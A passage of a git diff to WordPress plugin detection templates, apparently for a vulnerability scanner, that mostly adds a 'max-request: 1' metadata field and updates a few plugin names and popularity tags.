a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index eed9d50e46..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -1,15 +1,16 @@ id: wordpress-mailpoet info: - name: MailPoet – emails and newsletters in WordPress Detection + name: MailPoet – Newsletters, Email Marketing, and Automation Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8e1cb46cf0..8881e23860 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index c45ef4bf89..0bc823830f 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index a224d85727..7fbeea5917 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: + max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/php-compatibility-checker.yaml b/http/technologies/wordpress/plugins/php-compatibility-checker.yaml index 9b0431ddaa..b2b2dc4c95 100644 --- a/http/technologies/wordpress/plugins/php-compatibility-checker.yaml +++ b/http/technologies/wordpress/plugins/php-compatibility-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/php-compatibility-checker/ metadata: + max-request: 1 plugin_namespace: php-compatibility-checker wpscan: https://wpscan.com/plugin/php-compatibility-checker tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 56d2e4efcd..829edad042 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 656ad7dfe5..648ee176ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml b/http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml index 22c77a193f..f2bd03721d 100644 --- a/http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml +++ b/http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ssl-insecure-content-fixer/ metadata: + max-request: 1 plugin_namespace: ssl-insecure-content-fixer wpscan: https://wpscan.com/plugin/ssl-insecure-content-fixer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 2d7d015a16..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -1,12 +1,13 @@ id: wordpress-tablepress info: - name: TablePress Detection + name: TablePress – Tables in WordPress made easy Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git 